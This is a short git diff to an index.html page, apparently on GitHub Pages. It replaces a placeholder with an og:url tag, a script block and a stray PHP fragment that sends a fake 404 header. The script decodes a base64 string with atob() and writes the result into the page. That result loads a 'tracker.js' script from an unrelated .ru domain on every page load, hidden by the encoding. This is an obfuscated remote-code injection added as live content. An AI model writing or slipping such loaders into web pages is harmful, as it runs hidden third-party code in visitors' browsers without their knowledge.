--- a/index.html
+++ b/index.html
@@ -1,1 +1,12 @@
-123456789
+<meta property="og:url" content="https://homeliveparh.github.io/at/" />
+
+ <script>
+      var string = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8va2xvLXN0b3JlLnJ1L3RyYWNrZXIuanMiPjwvc2NyaXB0Pg==';
+      var decodedString = atob(string);
+      document.write(''+ decodedString +'');
+  </script>
+ <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
+
+<?
+header("HTTP/1.0 404 Not Found");
+echo '1';
